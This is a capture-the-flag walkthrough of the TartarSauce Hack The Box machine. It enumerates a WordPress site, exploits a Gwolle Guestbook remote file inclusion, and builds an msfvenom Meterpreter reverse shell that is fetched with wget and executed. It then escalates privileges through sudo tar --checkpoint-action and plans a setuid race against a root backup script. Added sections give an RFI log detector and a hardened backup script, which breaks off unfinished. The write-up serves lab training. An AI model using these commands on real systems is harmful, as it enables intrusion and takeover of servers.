TartarSauce Walkthrough - by ȜӎŗgͷͼȜ

This is a walk-through of the TartarSauce challenge created for Hack The Box by ihack4falafel & ȜӎŗgͷͼȜ. This guide shows the intended path for completing the challenge.

Scanning For Open Ports

To begin, we can use nmap to do a full port-range scan for any open ports/services on tartarsauce.htb.


[email protected]:~/TartarSauce# nmap -p- tartarsauce.htb --open

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-21 22:30 GMT
Nmap scan report for tartarsauce.htb (10.0.0.8)
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:C1:E0:AD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.30 seconds

We have discovered 1 open port, which looks like http.

So now we can scan it in more detail.

Port 80 (http)


[email protected]:~/TartarSauce# nmap -p 80 tartarsauce.htb -A

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-22 18:32 GMT
Nmap scan report for tartarsauce.htb (10.0.0.8)
Host is up (0.00025s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
MAC Address: 00:0C:29:C1:E0:AD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms tartarsauce.htb (10.0.0.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds

We note the interesting directory paths and save them to a list.

From here, people will likely visit the paths listed in the robots.txt file manually. But they are all rabbit holes; more enumeration is needed.

Web Directory Enumeration (http)

[email protected]:~/TartarSauce# curl -s http://tartarsauce.htb/robots.txt |grep Disallow |cut -d' ' -f2 > robots.dict && cat robots.dict 
/webservices/tar/tar/source/
/webservices/monstra-3.0.4/
/webservices/easy-file-uploader/
/webservices/developmental/
/webservices/phpmyadmin/
[email protected]:~/TartarSauce# dirsearch -u http://tartarsauce.htb -e htm,html,txt,php -w robots.dict 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: htm, html, txt, php | Threads: 10 | Wordlist size: 5

Error Log: /opt/dirsearch/logs/errors-18-02-22_19-30-41.log

Target: http://tartarsauce.htb

[19:30:41] Starting: 
[19:30:41] 200 -    4KB - /webservices/monstra-3.0.4/

Task Completed


[email protected]:~/TartarSauce# nikto -h http://tartarsauce.htb/webservices/monstra-3.0.4/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.8
+ Target Hostname:    tartarsauce.htb
+ Target Port:        80
+ Start Time:         2018-02-22 19:32:29 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /webservices/monstra-3.0.4/robots.txt, fields: 0x5c 0x52fc22eddc500 
+ Entry '/admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /webservices/monstra-3.0.4/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /webservices/monstra-3.0.4/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /webservices/monstra-3.0.4/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /webservices/monstra-3.0.4/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ /webservices/monstra-3.0.4/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /webservices/monstra-3.0.4/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /webservices/monstra-3.0.4/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /webservices/monstra-3.0.4/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /webservices/monstra-3.0.4/sitemap.xml: This gives a nice listing of the site content.
+ OSVDB-25497: /webservices/monstra-3.0.4/index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /webservices/monstra-3.0.4/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /webservices/monstra-3.0.4/index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /webservices/monstra-3.0.4/admin/: This might be interesting...
+ OSVDB-3093: /webservices/monstra-3.0.4/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ 7452 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2018-02-22 19:32:45 (GMT0) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Monstra is a dead-end troll…

More enumeration is required.


[email protected]:~/TartarSauce# dirsearch -u http://tartarsauce.htb/webservices/ -e htm,html,txt,php -w /usr/share/seclists/Discovery/Web_Content/big.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: htm, html, txt, php | Threads: 10 | Wordlist size: 20469

Error Log: /opt/dirsearch/logs/errors-18-02-22_19-36-52.log

Target: http://tartarsauce.htb/webservices/

[19:36:52] Starting: 
[19:37:41] 301 -  327B  - /webservices/wp  ->  http://tartarsauce.htb/webservices/wp/

Task Completed

[email protected]:~/TartarSauce# nikto -h http://tartarsauce.htb/webservices/wp/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.0.8
+ Target Hostname:    tartarsauce.htb
+ Target Port:        80
+ Start Time:         2018-02-22 21:58:27 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.80.135".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.80.135/webservices/wp/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /webservices/wp/wp-content/plugins/akismet/readme.txt, fields: 0x44cb 0x565bd87c9b9d6 
+ /webservices/wp/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /webservices/wp/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /webservices/wp/license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /webservices/wp/wp-login.php: Wordpress login found
+ 7446 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2018-02-22 21:59:02 (GMT0) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


So now we know we have a WordPress blog.

Wordpress Enumeration (http)

But when visiting the site, it fails to load. Looking at the response source, we can see it's because the stylesheet resources are being requested from a hard-coded IP address (192.168.80.135) that is no longer valid.

We can easily get round that by using a Burp match/replace rule.

Now we can view and navigate the site in a browser and see what we have.

We are able to confirm it's a WordPress blog, so now we scan it with wpscan.


[email protected]:~/TartarSauce# wpscan -u http://tartarsauce.htb/webservices/wp/ -e ap
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://tartarsauce.htb/webservices/wp/
[+] Started: Thu Feb 22 22:31:10 2018

[!] The WordPress 'http://tartarsauce.htb/webservices/wp/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.80.135/webservices/wp/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://tartarsauce.htb/webservices/wp/xmlrpc.php

[+] WordPress version 4.9.4 (Released on 2018-02-06) identified from meta generator, links opml
[!] 1 vulnerability identified from the version number

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[+] WordPress theme in use: voce - v1.1.0

[+] Name: voce - v1.1.0
 |  Latest version: 1.1.0 (up to date)
 |  Last updated: 2017-09-01T00:00:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/readme.txt
 |  Style URL: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css
 |  Referenced style.css: http://192.168.80.135/webservices/wp/wp-content/themes/voce/style.css
 |  Theme Name: voce
 |  Theme URI: http://limbenjamin.com/pages/voce-wp.html
 |  Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of rece...
 |  Author: Benjamin Lim
 |  Author URI: https://limbenjamin.com

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

   Time: 00:01:21 <========================================> (72873 / 72873) 100.00% Time: 00:01:21

[+] We found 3 plugins:

[+] Name: akismet - v4.0.3
 |  Latest version: 4.0.3 (up to date)
 |  Last updated: 2018-02-19T15:25:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] Name: brute-force-login-protection - v1.5.3
 |  Latest version: 1.5.3 (up to date)
 |  Last updated: 2017-06-29T10:39:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] Name: gwolle-gb - v2.3.10
 |  Latest version: 2.3.10 (up to date)
 |  Last updated: 2018-02-10T13:14:00.000Z
 |  Location: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[+] Finished: Thu Feb 22 22:32:39 2018
[+] Requests Done: 73235
[+] Memory used: 215.133 MB
[+] Elapsed time: 00:01:28

Interestingly, all the plugins seem to be up to date. However, if we go through the known exploits and manually check whether each one is really patched, we may get lucky.

And when we get to gwolle-gb, we find the following PoC in Exploit-DB.


[email protected]:~/TartarSauce# searchsploit gwolle
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | exploits/php/webapps/38861.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
[email protected]:~/TartarSauce# searchsploit -p 38861
  Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/38861/
     Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
File Type: UTF-8 Unicode text, with very long lines, with CRLF line terminators

Copied EDB-ID #38861's path to the clipboard.


[email protected]:~/TartarSauce# grep /gwolle-gb/ /usr/share/exploitdb/exploits/php/webapps/38861.txt
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
https://wordpress.org/plugins/gwolle-gb/changelog/
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[email protected]:~/TartarSauce#

Testing For The Remote File Include

Using a quick one-liner that serves the current directory with Python's SimpleHTTPServer and then requests the vulnerable endpoint with curl, we can see whether the RFI still works even though the version appears to be up to date.


[email protected]:~/TartarSauce# python -m SimpleHTTPServer 80  & sleep 2 && curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.0.0.4/
[2] 10194
Serving HTTP on 0.0.0.0 port 80 ...
[1]   Terminated              python -m SimpleHTTPServer 80
10.0.0.8 - - [22/Feb/2018 23:21:43] "GET /wp-load.php HTTP/1.0" 200 -

It worked! So now we can try to get code execution by serving some PHP in a file called wp-load.php. Let's knock together a quick bash script to execute any commands we want.


[email protected]:~/TartarSauce# ./gwolle-pwn.sh 'id;uname -a;cat /etc/os-*'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


Great, it worked. So now to get a reverse shell.
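From the defender's side, the RFI probe above leaves a clear trace in the web server's access log: a request to the Gwolle captcha endpoint whose abspath parameter starts with a URL scheme, whereas a legitimate value is a local filesystem path. The shell snippet below is an added example written for this walkthrough (it is not part of the original page or of the plugin) that flags such lines and tallies the source addresses; the log lines it runs over are constructed, not taken from the box.

```shell
#!/bin/sh
# Added example for this walkthrough: flag Gwolle Guestbook RFI probes in an
# Apache access log. The log lines below are constructed, not taken from the box.
SAMPLE_LOG='10.0.0.4 - - [22/Feb/2018:23:21:43 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.0.0.4/ HTTP/1.1" 200 512 "-" "curl/7.58.0"
10.0.0.9 - - [22/Feb/2018:23:22:01 +0000] "GET /webservices/wp/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.4 - - [22/Feb/2018:23:25:17 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=https%3A%2F%2F10.0.0.4%2F HTTP/1.1" 200 512 "-" "python-requests/2.18.4"
10.0.0.9 - - [22/Feb/2018:23:26:40 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Print the lines where ajaxresponse.php is given an abspath that starts with a
# URL scheme, either literal ("http://") or percent-encoded ("http%3A%2F%2F").
# A legitimate abspath is a local filesystem path, so a scheme is the tell.
# Arguments are log file paths; with none, stdin is read.
gwolle_rfi_hits() {
    grep -iE 'gwolle-gb/frontend/captcha/ajaxresponse\.php\?[^" ]*abspath=[a-z]+(://|%3a%2f%2f)' "$@"
}

# Number of suspicious lines in the input.
gwolle_rfi_count() {
    gwolle_rfi_hits "$@" | wc -l | tr -d ' '
}

# Per-source-address tally of suspicious lines ("count address" per line).
gwolle_rfi_sources() {
    gwolle_rfi_hits "$@" | cut -d' ' -f1 | sort | uniq -c
}

# Stand-alone run over the constructed sample: prints the two probe lines.
printf '%s\n' "$SAMPLE_LOG" | gwolle_rfi_hits
```

Pointed at a real log (`gwolle_rfi_hits /var/log/apache2/access.log`), the same functions work unchanged; the match is case-insensitive so upper- and lower-case percent-encoding are both caught.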

Getting A Shell

Let's start a Meterpreter listener.


msf exploit(multi/handler) > jobs 

Jobs
====

  Id  Name                    Payload                            Payload opts
  --  ----                    -------                            ------------
  0   Exploit: multi/handler  linux/x86/meterpreter/reverse_tcp  tcp://10.0.0.4:1337

Then use msfvenom to create a quick payload, and the gwolle-pwn.sh script to upload and execute it.


[email protected]:~/TartarSauce# msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.0.0.4 LPORT=1337 -o rev
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 957052 bytes
Saved as: rev
[email protected]:~/TartarSauce# ./gwolle-pwn.sh "wget http://10.0.0.4/rev && chmod +x rev && ./rev"

Then we get our reverse shell.


msf exploit(multi/handler) > 
[*] Sending stage (857352 bytes) to 10.0.0.8
[*] Meterpreter session 1 opened (10.0.0.4:1337 -> 10.0.0.8:42218) at 2018-03-07 17:50:57 +0000

msf exploit(multi/handler) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=33, gid=33, euid=33, egid=33
meterpreter > 

Enumeration

Following the usual enumeration steps, we find an inaccessible user home directory, and an interesting entry in www-data’s sudo privs.


meterpreter > shell
Process 29015 created.
Channel 1 created.
python -c "import pty;pty.spawn('/bin/bash')"
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /
cd /
[email protected]:/$ ls -al home
ls -al home
total 12
drwxr-xr-x  3 root  root  4096 Feb  9 08:59 .
drwxr-xr-x 22 root  root  4096 Feb 15 17:21 ..
drwxrw----  5 onuma onuma 4096 Feb 21 13:04 onuma
[email protected]:/$ sudo -l 
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
[email protected]:/$

Gaining a shell as the user

After a bit of research, we discover that tar can execute a command in the context of the invoking user via its --checkpoint-action option. So we can use it with sudo to run a command of our choosing as onuma and grab the user.txt hash.


[email protected]:/$ sudo -u onuma /bin/tar cf /dev/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash
<v/null /pwnd --checkpoint=1 --checkpoint-action=exec=/bin/bash              
/bin/tar: Removing leading `/' from member names
/bin/tar: /pwnd: Cannot stat: No such file or directory
[email protected]:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
[email protected]:~$ cd /home/onuma
cd /home/onuma
[email protected]:/home/onuma$ ls -al 
ls -al 
total 40
drwxrw---- 5 onuma onuma 4096 Feb 21 13:04 .
drwxr-xr-x 3 root  root  4096 Feb  9 08:59 ..
lrwxrwxrwx 1 root  root     9 Feb 17 05:19 .bash_history -> /dev/null
-rwxrw---- 1 onuma onuma  220 Feb  9 08:59 .bash_logout
-rwxrw---- 1 onuma onuma 3871 Feb 15 17:23 .bashrc
drwxrw---- 2 onuma onuma 4096 Feb  9 09:00 .cache
-rwxrw---- 1 onuma onuma   52 Feb 17 14:22 .mysql_history
drwxrw---- 2 onuma onuma 4096 Feb 17 11:39 .nano
-rwxrw---- 1 onuma onuma  655 Feb  9 08:59 .profile
drwxrw---- 2 onuma onuma 4096 Feb 15 14:35 .ssh
-rwxrw---- 1 onuma onuma    0 Feb  9 09:01 .sudo_as_admin_successful
lrwxrwxrwx 1 root  root     9 Feb 17 12:16 shadow_bkp -> /dev/null
-rwxrw---- 1 onuma onuma   33 Feb  9 09:54 user.txt
[email protected]:/home/onuma$ cat user.txt
cat user.txt
b2d...
[email protected]:/home/onuma$

After some more enumeration, we now find an interesting reference to a custom executable owned by root.


[email protected]:/home/onuma$ cat .mysql_history
cat .mysql_history
_HiStOrY_V2_
create\040database\040backuperer;
exit
[email protected]:/home/onuma$ ls -al /usr/local/bin/
ls -al /usr/local/bin/
total 8
drwxr-xr-x  2 root root 4096 Feb 17 14:25 .
drwxr-xr-x 10 root root 4096 Feb  9 08:55 ..
lrwxrwxrwx  1 root root   20 Feb 17 14:25 backup -> /usr/sbin/backuperer
[email protected]:/home/onuma$ ls -al /usr/sbin/backuperer
ls -al /usr/sbin/backuperer
-rwxr-xr-x 1 root root 1701 Feb 21 16:54 /usr/sbin/backuperer

Analysis of Backup App

If we look at it in more detail, we see it's a custom website backup script.


[email protected]:/home/onuma$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
[email protected]:/home/onuma$

OK, so the script source says it's an auto backup tool. So how is it auto-backing-up?

After a bit more enumeration we find the answer, as well as some interesting log files.


[email protected]:/home/onuma$ find / -name *backuperer* 2>/dev/null
find / -name *backuperer* 2>/dev/null
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/sys/kernel/slab/ext4_inode_cache/cgroup/ext4_inode_cache(1158:backuperer.service)
/sys/kernel/slab/ext4_inode_cache/cgroup/ext4_inode_cache(3188:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(3188:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1544:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1616:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(3512:backuperer.service)
/sys/kernel/slab/:aA-0000128/cgroup/dentry(1158:backuperer.service)
/sys/kernel/slab/:0000064/cgroup/kmalloc-64(3188:backuperer.service)
/sys/kernel/slab/:0000064/cgroup/kmalloc-64(1158:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1158:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(3188:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1544:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(1616:backuperer.service)
/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(3512:backuperer.service)
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
[email protected]:/home/onuma$ cat /lib/systemd/system/backuperer.timer
cat /lib/systemd/system/backuperer.timer
[Unit]
Description=Runs backuperer every 5 mins

[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service

[Install]
WantedBy=multi-user.target
[email protected]:/home/onuma$ cat /lib/systemd/system/backuperer.service
cat /lib/systemd/system/backuperer.service
[Unit]
Description=Backuperer

[Service]
ExecStart=/usr/sbin/backuperer

[email protected]:/home/onuma$ ls -al /var/backups |grep onuma
ls -al /var/backups |grep onuma
-rw-r--r--  1 onuma onuma  11881082 Mar  8 13:57 onuma-www-dev.bak
-rw-r--r--  1 root  root       2733 Mar  8 13:28 onuma_backup_error.txt
-rw-r--r--  1 root  root        219 Mar  8 13:57 onuma_backup_test.txt

[email protected]:/home/onuma$ cat /var/backups/onuma_backup_error.txt
cat /var/backups/onuma_backup_error.txt
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Sat Feb 17 12:46:04 EST 2018
------------------------------------------------------------------------
/var/tmp/.5ab88ff0386cb85760f49c5d8a1dc73ac80dc46c
Only in /var/www/html: index.html
Only in /var/tmp/check/var/www/html: ȜӎŗgͷͼȜ_5h377
Only in /var/www/html: webservices
[email protected]:/home/onuma$

OK, so the backup tool runs as a systemd service on a 5-minute timer, which means it runs as root.

Breaking down the source of the backuperer script to understand how it works will help us identify any vulnerabilities in its logic. The key points: it creates the archive as onuma with sudo -u onuma /bin/tar -zcvf $tmpfile /var/www/html, writing to a hidden file named /var/tmp/.[random sha1] in the world-writable /var/tmp. It then sleeps for 30 seconds before root extracts that same file into /var/tmp/check and diffs the result against /var/www/html.

This means that if we are quick and replace the temporary archive file in /var/tmp/[random sha1] within the 30-second window, we can cause root to extract any archive we put in its place.

We must also match the directory structure of var/www/html/, otherwise diff will not report a file mismatch and cause the integrity_chk function to fail like we need it to (it is the failure branch that leaves /var/tmp/check in place instead of cleaning it up).

Also, note that the /bin/tar -zxvf $tmpfile -C $check command runs as root, so it preserves the ownership and permission bits stored in the archive, including setuid.

So we can use a watch loop to wait for the /var/tmp/[random sha1] file to appear, then overwrite it with an archive that has the matching directory structure but contains a setuid-root shell binary instead of the website source.

This will force integrity_chk to fail, and the setuid file from our archive will have been extracted by root and will stay there for another four and a half minutes until the backup utility runs again.

This gives us a 4-minute-30-second window in which to run the file and pop a root shell.

At this point, everyone should get the hint in the name: use tar, use tar again, review the source code :D
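Reading the script from the defender's side, the weaknesses above map to concrete fixes: a private work directory instead of a hidden file in world-writable /var/tmp, a hash pinned at creation and re-checked immediately before extraction, a refusal to extract archives with setuid/setgid members, and extraction flags that stop a root tar from recreating the archive's stored owners and modes. The shell script below is an added example for this walkthrough, not the box's backuperer; it needs no root privileges, and the paths it works on are whatever the caller passes in (the demo at the bottom constructs its own web root).

```shell
#!/bin/sh
# Added example: a hardened take on the backup flow from the backuperer script.
# This is illustration code for the walkthrough, not the box's script, and it
# needs no root: the paths are whatever the caller passes in.
set -eu

# Hash helper: sha256sum on Linux, shasum on systems that lack it.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# True if any member of the archive carries a setuid or setgid bit. In the
# "tar -tv" listing the mode string shows 's'/'S' in the user-exec (4th) or
# group-exec (7th) column, e.g. "-rwsr-xr-x".
archive_has_setuid() {
    tar -tzvf "$1" | awk '{ print $1 }' | grep -qE '^.{3}[sS]|^.{6}[sS]'
}

# safe_backup SRC_DIR DEST_ARCHIVE
# 1. work in a fresh mktemp -d directory (mode 0700), not a predictable hidden
#    file in the world-writable /var/tmp;
# 2. pin the archive's SHA-256 right after creating it and re-check it
#    immediately before extraction, so a swapped file is rejected;
# 3. refuse archives with setuid/setgid members;
# 4. extract with --no-same-owner --no-same-permissions so the archive's stored
#    ownership and exact modes are not recreated by a privileged extractor;
# 5. only then run the diff and move the archive into place.
safe_backup() {
    src=$1
    dest=$2
    work=$(mktemp -d)
    archive=$work/backup.tgz
    check=$work/check

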